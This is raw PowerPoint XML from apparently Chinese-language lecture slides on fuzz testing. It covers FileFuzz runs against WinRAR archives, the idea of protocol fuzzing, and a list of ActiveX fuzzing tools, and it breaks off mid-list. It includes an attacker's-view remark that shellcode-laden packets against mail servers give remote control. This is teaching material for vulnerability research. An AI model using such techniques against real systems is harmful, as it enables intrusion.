              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）单击主界面上的“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>xecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选项卡，进入执行界面，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8-20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所示。考虑到机器性能与文件复杂程度，这里设置测试间隔时间为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>秒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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4120094" y="6480311"/>
            <a:ext cx="3951184" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>攻击参数设置</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6147" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="27325"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4333217" y="3811235"/>
            <a:ext cx="3524938" cy="269679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80166970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8.3.1 Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>软件工具为例，介绍对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的方法与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）单击“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>xecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>按钮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>开始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>逐个尝试用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>zip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解压缩工具来打开这些畸形文件，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8-21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="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4120094" y="6480311"/>
            <a:ext cx="3951184" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-21 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>攻击尝试</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7169" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="27287"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4168898" y="3532094"/>
            <a:ext cx="3853575" cy="2948217"/>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49396522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8.3.1 Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>软件工具为例，介绍对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的方法与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）执行完攻击尝试后将生成测试报告，报告中将描述整个攻击过程、参数以及是否发现异常，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8-22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="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4120094" y="6480311"/>
            <a:ext cx="3951184" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-22 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>生成测试报告</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8193" name="Picture 1" descr="未命名-4"/>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063315" y="3515150"/>
            <a:ext cx="4064742" cy="2965161"/>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47026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8.3.1 Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>邮件服务器、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器等网络应用中，服务器和客户端都需要解析按照一定顺序到达的遵守一定格式的数据包，用畸形数据包来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对协议解析的健壮性，这样的测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>称为协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>站在攻击者的角度，网络协议解析中的漏洞比文件格式解析时的漏洞更有价值。因为利用文件格式中的漏洞需要骗取用户点击载有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的畸形文件，攻击者比较被动。而一个邮件服务器程序在解析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SMTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>协议时如果产生堆栈溢出，攻击者就可以主动发送载有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的畸形数据包以获得远程控制。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议自身的复杂性，协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>要比文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>更</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>复杂一些。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="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xmlns="" val="29582288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8.3.1 Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4212612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>ctive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>X F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，更多的攻击者把目光放在第三方软件上，通过一个精心构造的页面来攻击第三方软件中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>ctive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>已经</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>成为“网马”惯用的手段。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>ctive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包括：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>COMR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>aider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>著名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>efense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LAB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>出品，是一款非常出色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>ctive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，并且可以免费使用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>ctive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
